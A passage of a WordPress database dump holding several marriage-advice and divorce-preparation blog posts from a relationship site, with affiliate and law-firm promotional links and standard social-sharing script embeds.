small details of every argument are never really going to deal with the big stuff. I’m talking about the issues that REALLY matter in your marriage, and the issues that keep coming up in every disagreement.</p>\n<p>Spend too much time at work?</p>\n<p>Partner feeling unappreciated?</p>\n<p>Don’t make love as much as you used to?</p>\n<p>Either of you feeling unfulfilled by your lifestyle or the relationship?</p>\n<p>Is the communication poor in your relationship?</p>\n<p>Does your need to always be right override the feelings of your partner? </p>\n<p>Spend less time worrying about the details and more time examining the issues and themes behind your arguments.</p>\n<p>* The issue is your job. The theme behind this may be balance between work and home life.</p>\n<p>* The issue is you not doing enough chores. The theme behind may be that you are being invited into making a greater contribution into coupledom.</p>\n<p>* The issue is your partner being grumpy with you all the time. The theme is your partner needing to feel validated in the relationship.</p>\n<p>If you have a greater understanding of what the key themes are behind your marriage issues you are better able to develop effective solutions that will really make a difference.</p>\n<p>The second key to transforming your relationship is to examine your beliefs about marriage. It’s okay to not have the fairytale marriage. Even the best couples don’t always get it right. But what makes the imperfections good or bad is how you choose as a couple to deal with it. </p>\n<p>When you disagree about something, do you sit down and talk about it, or is your first instinct to deny that there is a problem and hope that it will all go away?</p>\n<p>You need to understand that it is okay to be imperfect. In fact, admitting this to yourself and your partner can be one of the most liberating actions you take in transforming your marriage. </p>\n<p>Admitting your imperfections exposes a vulnerability that can bring you closer together as you find ways to get some meaning out of your issues. Acknowledging that you do make mistakes can open the door to acknowledging that there is a better way to do things, and one of the lessons we are called into as a couple is finding that solution together. </p>\n<p>Make a list of things that you have learnt since you got married, and a list of areas that you as a couple can both improve on. Then try sharing that list with your partner and ask them to contribute their thoughts.</p>\n<p>The third key to transforming your relationship is in recognizing the differences between men and women, and acknowledging the importance of both roles in the relationship. Just because your partner views something different to you doesn’t make them wrong, and the same goes for you. </p>\n<p>There are often several interpretations of the truth, and the key to marriage success is in recognizing that women and men have key fundamental differences in the way they view things. </p>\n<p>For men, their view may be a much more task-oriented approach to fixing an issue, where a woman may focus more on the emotional process as you both navigate your way through marriage issues. While both approaches are different, with compromise they can both achieve the same result.</p>\n<p>Write down 5 themes or issues. Then I want you to write down 5 task-oriented ways of trying to solve the situation. Then list 5 thoughts-based ways of communicating your way to a solution.</p>\n<p>The first step to transforming your marriage is in transforming YOU. Being married can be scary enough, but having marriage problems and not knowing how to fix them can be paralyzing! </p>\n<p>All it takes is the ability to step outside your day-to-day issues and look at different ways of viewing your marriage. Every marriage problem invites you into growing and offers you and your partner the opportunity to learn.</p>\n<p>Now it’s up to you to take what you have learned and apply it to YOUR marriage. </p>\n<div id=\"biobox\">\n<h1> </h1>\n</div>\n			  </div>\n			</div>\n		</div>','3 Keys To Transform Your Marriage - ','Recognizing you have a marriage problem is the first step along the road to transforming your marriage, and for most couples simply acknowledging there is','publish','open','open','','3-keys-to-transform-your-marriage-save-your-marriage','','','2017-10-04 09:09:49','2017-10-04 09:09:49','',0,'http://www.bournesociety.org.uk/3-keys-to-transform-your-marriage-save-your-marriage',0,'post','',0),(30,1,'2017-10-04 09:09:48','2017-10-04 09:09:48','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1191 post type-post status-publish format-standard hentry category-marriage tag-bad-marriage tag-communication tag-help tag-intimacy tag-marriage-counseling tag-marriage-problem tag-marriage-problems tag-relationship tag-relationship-marriage tag-resentment post_box top\" id=\"post-1191\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">3 Marriage Problems That Can Cause A Marriage To Go Bad				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p><span class=\"drop_cap\">W</span>hen a marriage goes bad it can be a shock to the couple’s friends and relatives. After all, most couples having marriage problems try to hide the fact that the marriage is not as happy as it seems.</p>\n<p>That is understandable because it is hard to admit your failings to people close to you.</p>\n<p>Sadly, a marriage can go bad on anyone, not only for an incompatible and dysfunctional couple but even for a loving and committed couple.</p>\n<p>To find out why a marriage can go bad in the first place you need to understand three of the major problems that can happen in a marriage.<span id=\"more-1191\"></span></p>\n<p><strong>Marriage Problem #1 – Taking Each Other For Granted</strong></p>\n<p>When a couple start taking each other for granted this is the start of the downward spiral in the marriage. Everyday routines and stresses can slowly cause you to drift apart emotionally and destroy the closeness you once had. Before you know it, you are like two strangers who don’t even bother to think about the other person anymore.</p>\n<p>So what can you do to stop taking each other for granted?</p>\n<p>Well, you can start doing things together again as a couple, going out on dates just like you did at when you first met. In fact, if you are the husband, to make it seem like a real date leave the house and pick her up just like you would do if you didn’t live together. That would be fun, wouldn’t it?</p>\n<p>You can also start showing more appreciation for your spouse to show them that you still care for him or her. Just do something spontaneous to surprise her, which can put some zest into your marriage and reduce the tedium of everyday life.</p>\n<p><strong>Marriage Problem #2 – Built Up Resentments.</strong></p>\n<p>Resentment, judgment, disappointment and lack of respect can slowly destroy the love you once had for your partner.</p>\n<p>When resentments builds up the love shuts down in a relationship and the couple loses touch emotionally. The result is that the intimacy that holds their marriage together slowly dies.</p>\n<p>So as a couple or individually each partner needs to release all their pent up frustrations and resentments so that the love, which is still flickers deep down, can rekindle and burn brightly once again.</p>\n<p><strong>Marriage Problem #3 – Toxicity and Deficiency Overload</strong></p>\n<p>If the couple has dysfunctional behavior patterns caused by unresolved past hurts and experiences – the relationship is going to be full of toxicities and deficiencies.</p>\n<p>In simple terms, toxicities are things in your marriage that you don’t want and deficiencies are things that you do want but are not getting in your marriage.</p>\n<p>A marriage that is full of toxicities and deficiencies can only endure them for so long, until it cracks under the strain.</p>\n<p>When this happens, the couple will then start to destroy the relationship, or start to avoid each other because of all the negative conditioning built-up from all the toxicity and deficiency.</p>\n<p>Eventually the marriage isn’t going to work anymore until the toxicities and deficiencies are recognized and dealt with. Unfortunately, many couples are not aware of this and no one tells them how to handle all the problems that have built up.</p>\n<p><strong>What can you do to solve marriage problems?</strong></p>\n<p>If you are faced with these major problems in your marriage, it can be saved with sound relationship advice. With the right system what was once a marriage gone bad can once again be a healthy and happy marriage.</p>\n<p>Thankfully, a relationship system has been developed for dealing with all the problems that can develop in any marriage. </p>\n<ul><li>One that will show you how to heal all the past wounds and release the pent up emotions caused by them.</li>\n<li>That will strengthen your basic relationship skills and enable you to have purposeful communication with your spouse once again.</li>\n<li>That will help you with conflict resolution and negotiation.</li>\n<li>And show you how to be more compatible with your spouse so that both of you have your needs met in the marriage.</li>\n</ul><p>The <a href=\"../go/counsellorinabox/\" rel=\"external\">Counsellor in a Box Home Study Program</a> is such a system and could be just what you need to .</p>\n<p>This is a proven system that has helped many couples overcome almost all kinds of difficult and challenging relationship and marriage problems.</p>\n<p>It was created by full time Relationship/Marriage counsellors and coaches who run their own relationship center in Canada, and unquestionably know what they are teaching or talking about. In fact, to prove it, they even train professional counselors themselves so you know you are dealing with bona fide relationship experts.  </p>\n<p> </p></div>\n			</div>\n		</div>','3 Marriage Problems That Can Cause A Marriage To Go Bad','When a marriage goes bad it can be a shock to the couple’s friends and relatives. After all, most couples having marriage problems try to hide the fact that the marriage is not as happy as it seems.','publish','open','open','','3-marriage-problems-that-can-cause-a-marriage-to-go-bad','','','2017-10-04 09:09:48','2017-10-04 09:09:48','',0,'http://www.bournesociety.org.uk/3-marriage-problems-that-can-cause-a-marriage-to-go-bad',0,'post','',0),(31,1,'2017-10-04 09:09:48','2017-10-04 09:09:48','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-1205 post type-post status-publish format-standard hentry category-marriage tag-happy-marriage tag-marriage tag-relationships post_box top\" id=\"post-1205\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">5 Easy, Golden Keys to A Happy Spouse				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/5-easy-golden-keys-to-a-happy-spouse/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Happy+Marriage,Marriage,Relationships&amp;b=2\" href=\"../5-easy-golden-keys-to-a-happy-spouse/\"></a></div>\n<p><span class=\"drop_cap\">A</span> relationship or marriage may be a long-term investment that is always in need of maintenance and room for growth – however having a happy spouse may not be as elusive and hard to have as one might think. </p>\n<p>The Following Are 5 Easy Golden Keys To A Happy Spouse:<span id=\"more-1205\"></span></p>\n<p><strong>1) Validate Your Spouse</strong></p>\n<p>Even the most easy-going person would like to be validated for his or her opinion, feelings and experiences and even the toughest-skinned person feels deflated, unfulfilled, unhappy even betrayed, backstabbed and unsupported when he or she in invalidated. It especially hurts when the invalidation comes from someone he or she loves.</p>\n<p>So a simple key to your partner’s happiness (although it may be hard to do at times especially when you think your spouse is wrong) is to validate your spouse in any area that he or she needs the validation. </p>\n<p>If your spouse is wrong eventually he or she will find out on his or her own but in the meantime he or she will feel supported and in a state of happiness because you have his or her back. </p>\n<p><strong>2) Have Fun</strong></p>\n<p>All because life and relationships can be complicated at times doesn’t mean that your relationship cannot revolve around fun and laughter. What is there to lose? </p>\n<p>There have been studies done that prove that employees are actually more productive when they are having fun, so not only will your relationship run smoother and more productively, your partner will be happy, the two of you will bond, sparks will get to fly all the time and your spouse will associate you and your relationship as an uplifting and joyful experience to share. </p>\n<p><strong>3) Compliment Your Spouse</strong></p>\n<p>The easiest going person as well as the toughest skinned person both has something in common – both want to be acknowledged for their good intention whether that is what they do, say or feel. </p>\n<p>So why not have a happy spouse by simply giving your partner a compliment and/or acknowledging a job well done or say that you understand his or her good intent – it takes a moment to do and his/her happiness and resulting appreciation is an investment into your relationship that will last forever. </p>\n<p><strong>4) Choose To Have Unconditional Love Towards Your Spouse</strong></p>\n<p>When two people share a partnership and relationship together there are going to be conditions, especially when requirements, needs and wants are concerned. </p>\n<p>However, you can choose to have unconditional love towards your spouse regardless of what your partner does, thinks,or feels – in other words you never need to withdraw love or be in judgment of your partner.</p>\n<p>When you choose to have unconditional love towards your spouse even if you don’t say anything (although starting off a conversation with “I love You” doesn’t hurt) your partner will feel your unconditional love and he/she will express his/her love in return by being in a state of happiness and joy. </p>\n<p><strong>5) Show Your Spouse Love In The Way He/She Feels Love</strong></p>\n<p>At our Centre we talk about what we call Communication Modes or Love Strategies which are different ways that people communicate as well as give and receive love. </p>\n<p>Some people feel loved when others do things for them, other people feel loved when they hear the words “I love You”, others feel loved when they are understood and others feel loved when they are touched in certain ways (not necessarily sexual, maybe holding hands, touching one’s hair or being hugged). </p>\n<p>Everyone is unique so whichever the ways are, the important thing is to find out what your partner’s communication mode or love strategies are so you can express your love to him/her and make sure that he/she will feel love your love for him or her.</p>\n<p>The end result once again is a spouse who is always happy because he (she) can feel your love. </p>\n<p>These 5 keys are not only simple in nature but these keys are also simple to carry out on a regular basis so both of you will have the time, energy and uplifting reinforcement to continue your happiness together now and always. </p>\n<p> </p></div>\n								</div>\n		</div>','5 Easy, Golden Keys to A Happy Spouse','','publish','open','open','','5-easy-golden-keys-to-a-happy-spouse','','','2017-10-04 09:09:48','2017-10-04 09:09:48','',0,'http://www.bournesociety.org.uk/5-easy-golden-keys-to-a-happy-spouse',0,'post','',0),(32,1,'2017-10-04 09:09:46','2017-10-04 09:09:46','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-1424 post type-post status-publish format-standard hentry category-marriage tag-anger tag-happy-marriage tag-keep-your-marriage tag-nancy-wasson tag-resentment post_box top\" id=\"post-1424\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">5 Marriage Tips For A Better Marriage				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/5-marriage-tips-for-a-better-marriage/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Anger,Happy+Marriage,Keep+Your+Marriage,Nancy+Wasson,Resentment&amp;b=2\" href=\"../5-marriage-tips-for-a-better-marriage/\"></a></div>\n<p><span class=\"drop_cap\">M</span>any people have grown up with misconceptions of what it takes to make a marriage work. The following five incorrect beliefs can damage your marriage. </p>\n<p>With them there are tips that will help you to overcome these mistakes and help you to have a better marriage.<span id=\"more-1424\"></span></p>\n<p><strong>Myth 1: Your spouse should automatically know what you need and want.</strong></p>\n<p>This is a prevalent myth among many spouses who believe that if a partner really loves them, the partner should instinctively and intuitively know what their needs and wants are. And, of course, that the partner should take immediate action to satisfy them. Hurt feelings and anger accumulates when the partner doesn’t figure out without being told what is expected of him (of her).</p>\n<p>Traci was really tired when she finally got home late from a long day in the office. She was looking forward to spending some time with her husband Alex to get some sympathy, cuddling, and nurturing—and perhaps a back rub or a foot massage to Alex, on the other hand, was clueless about Traci’s expectations and after greeting her, went back to watching a football game on TV.</p>\n<p>Alex didn’t realize there was a problem. He thought that he was being helpful by giving Traci time and space to wind down after a long day. Traci found herself fuming as the rest of the evening progressed but she didn’t say anything because she didn’t want Alex to spend time with her if he didn’t really want to. In her mind, whatever efforts he might make to nurture her wouldn’t count if he didn’t think of it himself.</p>\n<p class=\"alert\"><strong>Marriage Tip:</strong> Share your needs and wants directly with your spouse. Don’t make her (or him) second guess you or try to read your mind. Practice speaking up and saying “I’ve had a gruelling day and really need a back rub. Could you give me one?”</p>\n<p><strong>Myth 2: If your spouse would change his (or her) behaviour, you’d be happy and you could have a happy marriage.</strong></p>\n<p>This premise of this myth is that a spouse has to change before the partner can be happy and enjoy a happy marriage. It sounds simple enough. When the other person gets it together to become healthier and to change, then the marriage will improve by leaps and bounds.</p>\n<p>In the meantime, the partner can only wait and hope that one day the spouse will “see the light.” This, of course, puts the partner in the role of helpless victim whose very happiness depends on what the spouse decides to do. His (or her) present and future happiness is in the hands of the spouse.</p>\n<p>Buying into this myth lets the partner off the hot seat so that he (or she) doesn’t have to actually do anything except blame the spouse and wait to see if she changes. It’s a passive role that lets the partner sit back and avoid the challenge of working on himself (or herself).</p>\n<p>Alex was getting irritated with Traci coming home late every evening from work. She said that she had to get a big project done, but Alex couldn’t help thinking that she could leave earlier if she really wanted to.</p>\n<p>They used to meet at the gym after work to work out together, but now Alex found himself working out alone with increasing anger. He started blaming Traci for his unhappiness and for the stress her overtime at work was putting on the marriage. “If she would just come home on time, we could be happy again,” he thought.</p>\n<p class=\"alert\"><strong>Marriage Tip:</strong> Make a commitment to being happy whether or not your spouse ever changes. After all, you can’t give what you don’t have inside, so if you’re not happy yourself, you can’t create a happy marriage. Work on changing yourself to be the kind of partner you wish you had.</p>\n<p><strong>Myth 3: You should always put your spouse’s needs first to be a good partner.</strong></p>\n<p>The word “should” is often a red flag that indicates problems ahead. Who said that you “should” always put your partner’s needs first? Someone who told you that you’d be considered selfish if you didn’t? Someone who wanted you to feel guilty if you didn’t accept their viewpoint?</p>\n<p>In reality, it’s not healthy to always put other people’s needs before your own—no matter who the other person is. Doing so indicates a lack of respect for yourself, your time, your needs, and your goals.</p>\n<p>You can value your own needs without being selfish or overbearing. Many times spouses can find a creative way to meet the needs of both of them if they spend some time brainstorming and problem-solving. But that won’t happen if one spouse automatically devalues her (or his) needs and goes along with whatever the partner proposes.</p>\n<p>Traci always let Alex play golf with his friends on Saturdays while she stayed with their one-year-old daughter. Even though there were things she’d been wanting to do for months in what little free time she had, she always thought she was doing the right thing to suppress her own needs in favour of letting Alex enjoy himself.</p>\n<p>Finally, after months of denying herself, she finally had enough. She blew up at Alex at a seemingly insignificant provocation. She accused him of being selfish in always playing golf while she stayed at home. Alex was baffled. Traci had never hinted that there was a problem.</p>\n<p class=\"alert\"><strong>Marriage Tip:</strong> Show respect for yourself by valuing yourself and your needs and preferences. Become more aware of when you treat your partner’s needs as more important than your own. Marriage is about compromise and both people getting their needs met at least part of the time. If you don’t value yourself, others won’t, either.</p>\n<p><strong>Myth 4: Your spouse should always contribute 50% to the marriage.</strong></p>\n<p>It sounds good in theory, but in reality marriage hardly ever turns out to be as neatly divided as this myth implies. Over time, there should be some balance of sorts, but the effort and time expended by each partner may never be completely equal.</p>\n<p>There are many times when one spouse or the other carries most of the load or makes most of the effort in a marriage. Perhaps one spouse works out of town during the week or is clinically depressed. A spouse may be chronically ill, in physical pain, or busy pursuing a college degree. Or one spouse may handle the majority of the child care.</p>\n<p>In these cases, the spouse who is keeping the marriage going may be contributing 80% to the marriage while the partner weighs in at only 20%. In time, the balance may shift in other ways to even out the load more, or the partners may exchange places. Instead of trying to keep everything equal on a daily basis, look at the overview and focus on the bigger picture.</p>\n<p>Traci felt guilty when she decided to take college classes two nights a week after work. She knew that this meant Alex had to carry a heavier load of chores, housework, and errands while she studied and attended classes. While Alex was supportive and didn’t complain, Traci knew that he was giving more of himself to keep the marriage going than she was.</p>\n<p>Five years later, Alex decided he wanted to change jobs and accept a more challenging, better-paying position that required him to travel during the week. All of a sudden, Traci found herself giving much more time and energy than Alex to keeping the marital relationship going. She remembered Alex’s support of her when she was pursuing her college degree and was glad to be able to give to him in return.</p>\n<p class=\"alert\"><strong>Marriage Tip:</strong> Think in terms of giving a 100% effort to your marriage when needed. If both you and your spouse are each giving 100%, then you’ll be in a positive place to handle the extra stress that problems and unforeseen challenges can bring.</p>\n<p><strong>Myth 5: Your goal is to have a peaceful marriage with as few disagreements as possible.</strong></p>\n<p>Over the years, I have heard many couples brag that they never fight and hardly ever argue. When this happens, I know that most likely one spouse or the other has been trying to keep accumulated anger, frustration, and resentment in an emotional “closet” with the door shut. This only works for so long and then the closet door bursts open and all the heightened emotions spill out to contaminate the marital relationship.</p>\n<p>The goal is not to have a marriage with no arguments or disagreements. The goal is to find a way to disagree without being disagreeable or disrespectful to each other. When anger and resentments are buried in a relationship, the passion is also snuffed out in the emotional debris.</p>\n<p>Some lukewarm marriages could benefit from more open disagreements, heated arguments, and strongly stated viewpoints and opinions. At least then the partners would be both engaged in the relationship instead of letting it silently die off.</p>\n<p class=\"alert\">\n<strong>Marriage Tip:</strong> Make a commitment to express your real opinions, needs, and preferences to your spouse. If you are afraid of your spouse’s anger, schedule a counselling session to discuss your concerns with a therapist present to mediate. You may need to develop a set of “fair fighting rules” with the help of the counsellor in order to feel safe in speaking up at home.</p>\n<p>Alex had been brought up in a family that avoided confrontations. He decided early on in his marriage to Traci that he didn’t want a marriage filled with conflict and arguments. When Traci felt strongly about something, Alex would generally just go along with her to keep the peace, even if he didn’t really want to.</p>\n<p>He hesitated to rock the boat by disagreeing and almost always hid his true feelings from Traci. Their friends all remarked about how well Alex and Traci always got along, and Alex and Traci enjoyed telling others that they never argued or disagreed. The marriage was calm and peaceful, but the passion gradually faded away and left a feeling of blandness and emptiness behind.</p>\n<p class=\"alert\"> </p></div>\n								</div>\n		</div>','5 Marriage Tips For A Better Marriage','','publish','open','open','','5-marriage-tips-for-a-better-marriage','','','2017-10-04 09:09:46','2017-10-04 09:09:46','',0,'http://www.bournesociety.org.uk/5-marriage-tips-for-a-better-marriage',0,'post','',0),(34,1,'2018-10-04 09:10:59','2018-10-04 09:10:59','<div id=\"content\" class=\"hfeed\">\r\n<div class=\"post-43 post type-post status-publish format-standard hentry category-divorce tag-marriage-counselor\">\r\n<h1 class=\"entry-title\">5 Things To Do Before You Even Think About Getting A Divorce</h1>\r\n<div class=\"byline-meta\"></div>\r\n<div class=\"entry-content\">\r\n\r\nSeeking a divorce is the last resort in a broken marriage. No matter the circumstances or reasoning, divorces can be extremely tough for all parties involved, so it helps to have a divorce attorney, similar to these <a href=\"https://www.marquezlaw.com/\">denver family law attorneys</a> on your side, to help you through it.  \r\n\r\nIf you\'re looking for guidance on what to do before seeking a divorce, continue reading below. If you\'re based in the Brisbane area and are currently seeking legal advice, <a href=\"https://emfl.com.au/services/\" target=\"_blank\" rel=\"noopener\">find out more here.</a>\r\n<span id=\"more-43\"></span>\r\n<h3>1. Talk to a Marriage Counselor or other professional who may be able to help you .</h3>\r\nEven if you don\'t think there\'s hope for the marriage, divorce counseling can help you discover what went wrong, how to cope, and how to pick up the pieces and go on. Don\'t wait for your spouse to participate. If you don\'t know how to find a qualified counselor, our firm will be glad to recommend one or you can check out the directory of professionals at stayhappilymarried.com. Your employment, social or religious contacts might also provide leads.\r\n<h3>2. Talk to an attorney before you do anything.</h3>\r\nEven if you don\'t end up hiring an attorney, like the <a href=\"https://www.thetxattorneys.com/fort-worth-divorce\">Sisemore Law</a> firm, to handle your separation or divorce, you would be well advised to get as much information as you can before you even discuss divorce with your spouse.  There\'s a lot to know about divorce in North Carolina our laws are complex and even the simplest situation can be very confusing to families already in distress. Actions you take now may very well affect the outcome of your divorce (see #3) and you need to understand your options ahead of timenot some time down the road when it may be too late to alter the outcome. Click here to find attorneys who are well versed in the intricacies of North Carolina divorce law.\r\n<h3><a href=\"../go/divorcedefense/\" target=\"_blank\" rel=\"nofollow noopener\"><em><strong>Women: Getting A Divorce? You Might Want To Read This...</strong></em></a></h3>\r\n<h3>3. Do not move out of the marital home without talking to an attorney first.</h3>\r\nLeaving the house without a good reason may cause you to pay alimony or may result in your inability to collect alimony. By contacting good <a href=\"https://www.ljacobsonlaw.com/pa/divorce-attorney-harrisburg/\">divorce lawyers Harrisburg PA</a> way, or wherever you might be searching for a lawyer, you can get the best deal regarding your home. If you leave the house, you may also be unable to return until after a court divides the property. This process might take more than a year. The best advice is to stay in the house until after you talk with an attorney unless your spouse is violent. If your spouse is violent, you must take all steps necessary to protect yourself and your children.\r\n<h3>4. If you have been involved in any extramarital affairs, talk to a lawyer before you discuss this with your spouse or anyone else.</h3>\r\nIn this case, honesty may not be the best policy. In addition to the fact that adultery is illegal in some states, admission of an affair can have other dire consequences. If your spouse is a candidate for alimony, any illicit sexual behavior on your part (during the marriage which includes the time you are separated) could end up costing you thousands in additional alimony payments.\r\n<h3>5. Take concrete steps to safeguard your assets before you and your spouse begin discussing divorce.</h3>\r\nOne of these steps is to take possession of certain assets during separation, especially any assets you wish to continue to use, such as furniture and vehicles, and those assets that might be liquidated by your spouse, including precious gems and stones, other collectibles, cash, and bearer bonds. Ultimately, knowing <a href=\"https://www.eatons-solicitors.co.uk/blog/read/70/protecting-your-finances-during-divorce\">how to protect your finances during the divorce process</a> sooner rather than later is the key to a successful divorce. With this in mind, reaching out to a local law firm for additional financial advice from a legal perspective is almost always in your best interest.\r\n\r\nAnother self-protective step is to file what is known as a Lis Pendens in the Deeds Office of any county where you and/or your spouse own real property. The lis pendens puts third parties on notice of your claim to have an interest in the real estate against which the lis pendens is docketed. The lis pendens is basically a notice of pending litigation that may affect real property. A properly recorded and served lis pendens clouds the title to the property, preventing an effective sale of the property behind your back. The rules regarding a lis pendens contain very specific requirements, all of which are spelled out in section 1-116 and the following sections of the North Carolina General Statutes.\r\n\r\nA third possible step to protect the assets of your marriage is to get an injunction restraining your spouse from transferring or otherwise disposing of any property covered by the restraining order. Your attorney can also use an injunction to get your separate property returned to you, where your separate property is in the possession of your spouse and the spouse refuses to give it to you. The equitable distribution statute also provides a means for you to obtain an interim distribution of marital property, pending a final resolution of the property matter. Such an interim allocation could, for instance, give you much needed funds on which to live.\r\n\r\nOther protective measures you might consider in your divorce planning include: (1) protecting your own credit rating by freezing or closing joint cards and by blocking your spouse\'s access to other joint credit such as a home equity loan; (2) closing joint bank accounts and opening accounts in your own, individual name; (3) changing the name of the responsible party on utility and other bills; and (4) spending where possible your spouse\'s separate property first, marital property next, and your own separate property last.\r\n\r\nWhile this list will help you get started on the right track, it is by no means a complete list of all the things you need to do and know if you are considering a divorce. For more information about the rights and duties of separating and divorcing husbands and wives visit http://www.rosen.com. You\'ll find a complete law library, downloadable divorce forms, a legal fee calculator, a child support calculator, lists of professionals who can help you and stories from people just like you who have survived divorce.\r\n\r\nLee S. Rosen is a Board Certified Family Law Specialist and founder of Rosen Divorce in North Carolina. Rosen Divorce is the largest divorce firm in the Southeastern United States. For more information visit <a href=\"http://www.rosen.com/\" target=\"_new\" rel=\"nofollow\">http://www.rosen.com.</a>\r\n<h3><a href=\"/\" target=\"_blank\" rel=\"noopener\"><em><strong>Men: If You Are Getting A Divorce,You Might Want To Read This...</strong></em></a></h3>\r\n</div>\r\n</div>\r\n</div>','5 things to think about when getting a divorce','Thinking about getting a divorce? There are many steps to take before you can start to think about getting a divorce. This article will help you...','publish','open','open','','getting-a-divorce-5-things-to-think-about-first','','','2018-11-08 15:17:05','2018-11-08 15:17:05','',0,'http://www.bournesociety.org.uk/getting-a-divorce-5-things-to-think-about-first',0,'post','',0),(35,1,'2017-10-04 09:11:42','2017-10-04 09:11:42','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-44 post type-post status-publish format-standard hentry category-divorce tag-child-tax-credit tag-divorce tag-social-security\">\n	\n				<h1 class=\"entry-title\">69 VERY Big Divorce Mistakes You Do NOT Have To Make</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p> </p>\n<p>There are so many mistakes you do NOT want to make if your divorce is just beginning or if it is in process. I’ve listed the 69 biggest reasons I could come up with. (All pronouns are used interchangeably.) First, I do not want anyone to think I am condoning being unfair to your spouse. The things each of you had before your marriage should stay with that person. The other things, tangible items, should be split as equally as possible between each of you.<span id=\"more-44\"/></p>\n<p>1. Giving up control of your divorce – this is NOT your lawyer’s divorce</p>\n<p>2. Not keeping records of everything (i.e., when you pick up the kids, when you drop them off, when your ex calls, what she wants when she does call – and if it’s just to ‘see how you’re doing’ or to interrupt everything you and the kids are doing, put a stop to it immediately), etc.</p>\n<p>3 Dividing up property without a thorough inventory – must have a complete list of what you own and what you owe ~ a 50 – 50 division of property is NOT the same thing as a fair division of property</p>\n<p>4. Keeping the house even if you can’t afford it ~ let your ex have the headache or sell it</p>\n<p>5. Not asking your ex to guarantee child support payments (if he is ordered to pay) with life insurance</p>\n<p>6. Not seeking financial advice from someone other than your attorney or friends</p>\n<p>7. Not setting up a specific parenting schedule ~ do not agree to liberal and frequent visitation (what works in the beginning will likely not work later on)</p>\n<p>8. Not making sure there is a provision for your access to or sharing of medical and school records</p>\n<p>9. Not adding a provision for discussion prior to your ex moving away with the kid(s)</p>\n<p>10. Spending too much time and money letting lawyers gather information – see the mykidstoo? article ‘Find the Money’ 11. If it is close to 10 years, not waiting until that 10 year mark ~ it could be a difference in collecting against your ex’s Social Security benefits (of course, if your ex doesn’t have any Social Security benefits, this is a moot point ~ this also works in reverse with your ex collecting against your Social Security benefits)</p><div style=\"clear:both;\"/>\n<p class=\"pages\"> </p>\n			  </div>\n	</div>\n			      </div>','69 of the worst Divorce Mistakes that you shouldn\'t make','There are so many mistakes you do NOT want to make if your divorce is just beginning or if it is in process. I\'ve listed the 69 biggest reasons I could','publish','open','open','','69-very-big-divorce-mistakes-you-do-not-have-to-make-save-your-marriage','','','2017-10-04 10:14:50','2017-10-04 10:14:50','',0,'http://www.bournesociety.org.uk/69-very-big-divorce-mistakes-you-do-not-have-to-make-save-your-marriage',0,'post','',0),(36,1,'2017-10-04 09:12:01','2017-10-04 09:12:01','<div id=\"content\" class=\"hfeed\">\r\n\r\n			<div class=\"post-13 post type-post status-publish format-standard hentry category-sexless-marriages tag-marriage tag-sexless-marriage post_box top\" id=\"post-13\">\r\n				<div class=\"headline_area\">\r\n					<h1 class=\"entry-title\">Sexless Marriage – 7 Mistakes To Avoid				</h1>\r\n				</div>\r\n				<div class=\"format_text entry-content\">\r\n<p><span class=\"drop_cap\">S</span>ometimes people who are stuck in a<em><strong> sexless marriage</strong></em> are stuck because they are dumb when it comes to the intricacies of sexuality and the expression of love through sexuality. It isn\'t that those who are stuck are dumb, but it is that they are dumb when it comes to sexuality. It\'s for that group of \"dumb\" folks that I have written this list.<span id=\"more-13\"></span></p>\r\n<h2><em><strong>Sexless Marriage – First Dumb Thing to Do</strong></em></h2>\r\n<p>You\'ve heard it said that the definition of \"crazy\" is doing the same thing over and over again, expecting different results. If what you are doing is crazy, then you better stop. I\'m fond of telling myself, and others, that if what you are doing isn\'t working – try something else!</p>\r\n<p>Living systems survive because they are able to adapt, to change to the circumstances in which they find themselves in such a way that they are always better off. If what you are doing together sexually has you stuck, then adapt and do something else. It\'s crazy to keep doing something that doesn\'t work.</p>\r\n<h3><em><strong>Second Dumb Thing to Do</strong></em></h3>\r\n<p>However, it is really dumb to just do nothing! Lots of people give up – not because they are screwed up people – but because they simply don\'t know what else to do. If your paradigm is \"I can\'t\" or \"she won\'t\" or \"he won\'t\" then you have to think outside of that paradigm. It is dumb to do nothing when you can get smart about having great sex. If you\'re wanting to start having better sex then it could be a wise idea to look on a site like <a href=\"https://kandid.com/\">kandid.com</a> and start incorporating sex toys into the bedroom. Experimenting with toys can be an incredible bonding experience, as well as maybe helping to re-ignite the flame between you and your partner. But <a 